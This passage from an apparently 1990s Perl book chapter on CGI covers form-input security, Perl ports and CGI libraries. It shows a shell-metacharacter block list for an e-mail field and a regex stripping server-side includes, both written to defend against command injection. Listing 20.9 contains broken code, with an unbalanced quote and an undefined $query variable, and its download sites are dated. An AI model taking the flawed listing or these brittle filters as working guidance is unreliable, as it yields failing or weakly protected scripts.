If a user puts this into the form, and you use the previous mailing piece of code, you'll have not only sent them the information you wanted them to receive, but unfortunately you would have also sent the server's password file along with it. (This isn't a smart move.) You can get around this problem by taking these special characters out of the e-mail address, by implementing the following:


if ($in{'e-mail'} =~ tr/;,<>*|`&$!#()[]{}:'"//) {
  print "Content-type: text/html\n\n";
  print "<html><head><title>Bad E-Mail Address</title></head>\n";
  print "<body><center><h1>Bad E-Mail Address</h1></center>\n";
  print "You entered illegal characters in your email address.";
  print "Please go back and try again.<p>\n";
  print "</body></html>\n";
  exit;
}

The preceding piece of code checks for any characters that shouldn't be in a standard e-mail address and returns an error to the user if one is present. This helps prevent people from putting dangerous e-mail characters into their e-mail names. It patches up a security hole. Another way to get around the security problem when invoking a piece of e-mail to the user is to use the -t flag with sendmail, which allows you to specify the e-mail address in the header of the message, rather than from the command line, where it's more open to security holes.


open(MAIL,"|sendmail -t");
print MAIL "To: $in{'e-mail'}\n";

It might be a good idea to implement both security patches if you're planning on sending e-mail automatically to users after they fill out your form.

Another security hole that's important to check for is the possibility of users including server-side includes in the form they fill out. You want to strip all of this out of their comments, or any other fields of the form that might be echoed back to the user. If you have a comment form and the users' responses are echoed back (after they fill out the comment field) on a resulting page, make sure that you include the following portion of code:


$in{'comments'} =~ s/<!--(.|\n)*-->//g;

This will take out any references to server-side includes, which could allow a back-door entry through one of your scripts. Many of these precautions aren't necessary when using some of the better CGI libraries because they already check for this, but when writing your own CGI scripts from scratch, it can be extremely critical.

Aside from these examples, you can inadvertently allow users access to execute shell commands through your CGI scripts in many other ways. Use the following checklist to check your scripts for holes:

CAUTION
This is in no way a complete representation of the security threats in CGI programs. For more information, you should consult some of the FAQ files about CGI and Web security. Lincoln D. Stein has written the WWW Security FAQ, which can be found at http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq.html. Paul Phillips has written another useful FAQ file, which is geared solely toward CGI security: http://www.primus.com/staff/paulp/cgi-security/

Obtaining the Latest Version of Perl 5

The latest version of Perl 5 can always be obtained from Larry Wall's FTP site. Since he's the creator of Perl, this is probably the site where the newest versions of Perl will always appear first. Before installing the version of Perl on the CD-ROM, you may want to check this site to see whether he has updated the version since this book was published. This site is located at ftp://ftp.netlabs.com/pub/outgoing/perl5.0/.

Flavors of Perl

Perl can run on almost all UNIX machines, provided you follow the configuration instructions when installing the binary to make sure that you're using all the right commands. There are also many non-UNIX ports of Perl for operating systems such as MS-DOS, Windows 3.1/NT/95, Macintosh, OS/2, and others. The following sections detail where to find Perl.

NOTE
Many of the Perl versions are also included on the CD-ROM in the back of the book. Most versions of Perl, as well as those ported to other operating systems, can be found at the mirror site ftp://ftp.cis.ufl.edu/pub/perl/CPAN/src/

Implementing Perl on a UNIX Machine

Perl was originally written for the UNIX platform and can be successfully compiled on almost all UNIX systems. Perl can be downloaded at the FTP site ftp://ftp.netlabs.com/pub/outgoing/perl5.0/. Larry Wall, creator of Perl, keeps the released versions of Perl at this site. You also can download the Perl source code from many mirror sites. Following is a list of a few of these mirror sites, which also can be found on the CD-ROM accompanying this book:

It's a good idea to try to use the location nearest you. It will most likely be the fastest route to downloading the Perl source.

Implementing Perl with Windows 95 and Windows NT

Windows NT binaries of Perl ports can be found at http://www.perl.hip.com/. Although they were compiled for Windows NT version 3.5, these binaries also run reasonably well under Windows 95 and Win32s.

Implementing Perl with MS-DOS and Windows 3.1

BigPERL4, along with several other MS-DOS ports of Perl, can be found at the FTP site ftp://ftp.ee.umanitoba.ca/pub/msdos/perl/perl4. Some of the features of BigPERL4 include the following:

Implementing Perl with OS/2

OS/2 implementations of Perl have been added to the official distribution, meaning that they can be found with the UNIX files at the sites listed earlier in the section "Implementing Perl on a UNIX Machine."

Implementing Perl on a Macintosh

MacPERL, the Perl port to the Macintosh, can be found at the FTP site ftp://nic.switch.ch/software/mac/perl. The current version of MacPERL is 4.18 and supports Perl 4.036.

A Perl 5 port to the Macintosh, which works on the PowerPC, is now available from ftp://nic.switch.ch/software/mac/perl/. It's relatively stable and is now preferred over MacPERL 4.036.

NOTE
Keep in mind that when setting up many of the Perl ports for different operating systems, they aren't always complete ports. Some functions simply can't be well represented on operating systems other than UNIX. One example of this is the crypt function. Used to encode and decode passwords on a UNIX machine, this function isn't available for the Macintosh, Windows, DOS, OS/2, and other platforms to which Perl has been ported. Therefore, always check to make sure that your Perl port and version support all the features located inside a Perl script

Common Perl CGI Libraries

Many public-domain Perl libraries have standard routines for parsing and creating CGI scripts and forms. A few of these, detailed in the following sections, include cgi-lib.pl, CGI.pm, and libwww.pl.

cgi-lib.pl

This simple library, which you can find on the CD-ROM included with this book, can be used to manipulate CGI input from forms. It consists of several subroutines, which can be called from any Perl CGI script. For example, if you want to have a form that simply returns to the screen the values that the user submits, to show what they filled in on the form, your Perl script would look something like listing 20.8.


Listing 20.8  Submitted Values to cgi-lib.pl
#!/usr/local/bin/perl
# Simple CGI Script

require "cgi-lib.pl";

# Read and parse the form information.
&ReadParse(*input);

# Print the Content-type: header so that browsers will recognize
# information as HTML.
print &PrintHeader;

# Print all of the variables to the user's screen.
print &PrintVariables;

This is just a simple example of what cgi-lib.pl can be used for. You can also use it to generate forms as well as parse them. Full details and installation instructions can be found at http://www.bio.cam.ac.uk/cgi-lib/.

CGI.pm

CGI.pm is a Perl 5 library. On top of providing all the routines that cgi-lib.pl does, CGI.pm offers many functions that allow for the creation of forms. Rather than have to remember the HTML syntax for all form elements, you can generate them with a series of calls to Perl functions with this script.

CGI.pm is included on the CD-ROM that accompanies this book, but you can also download it from the following URL, along with complete documentation and installation instructions:

http://www-genome.wi.mit.edu/ftp/pub/software/WWW/

When you have CGI.pm on your system, the installation instructions explain how to install the program and what commands to use.

NOTE
CGI.pm has successfully compiled and run under Windows NT using the WebSite Web server. No changes are required in the source code. CGI.pm is also compliant with the VMS version of Perl 5; however, the Perl 5 port for the Macintosh needs the MacPERL extension before it can communicate with a MacHTTP server

Say that you want to create a simple form that asks users what they think of the page so far. The script you would use to make this comment form and the CGI program could be contained in one file with CGI.pm, and would look something like listing 20.9.


Listing 20.9  Getting Feedback from Users
#!/usr/local/bin/perl
# Sample CGI.pm Script
# Created by Matt Wright

# Tell PERL to use the CGI.pm functions.
use CGI;

# Create the new form CGI.
$form = new CGI;

# Print the HTML compliant header.
print $form->header;

# Start the Form.
print $form->startform;

# Ask the Question.
print "How is the page so far?\n";

# Give the options in a popup menu.
print "$form->popup_menu(-name=>'question',
                         -values=>['Is Great!',
                                   'Could Use Some Work',
                                   'Needs Major Improvement']);

# Give the user a submit button.
print "<p>",$form->submit;

# End the Form.
print $form->endform;

# If the form has been submitted, send back the information they
# filled in.

if ($query->param) {
   print "You think that this page ";
   print "<b>",$form->param('question'),"</b>\n";
}

CGI.pm contains many functions that allow you to create forms of almost any nature. The available functions include opening a form, text-entry fields, password fields, file upload fields, popup menus, scrolling lists, check boxes, radio buttons, submit and reset buttons, hidden fields, clickable images, auto-escaping HTML, and many more-including some advanced techniques that are explained in the documentation that comes with CGI.pm.

TIP
The newest version (2.13) now supports file upload from Netscape 2.0 browsers. Examples are included in the documentation

libwww.pl

This Perl 4 library, based on version 4.036 of Perl, is being developed as a collaborative effort to aid in the creation of useful WWW clients and tools. You can find libwww-perl on the CD-ROM included with this book, or you can download it from

http://www.ics.uci.edu/WebSoft/libwww-perl/

libwww-perl now supports all requests and responses of the HyperText Transfer Protocol version 1.0.

Many tools are included with the distribution of libwww-perl that are based on the program. Two of the main tools that use libwww-perl and can be downloaded from the preceding site are MOMspider and w3new. MOMspider, which stands for Multi-Owner Maintenance Spider, was created by Roy Fielding. w3new takes a list of URLs out of a hotlist, which you provide, and retrieves the documents from the Web, reporting their last modification dates.

The following packages are included in the libwww-perl distribution and are very useful if you want to create programs that interface with Web servers or the HTTP/1.0 protocol: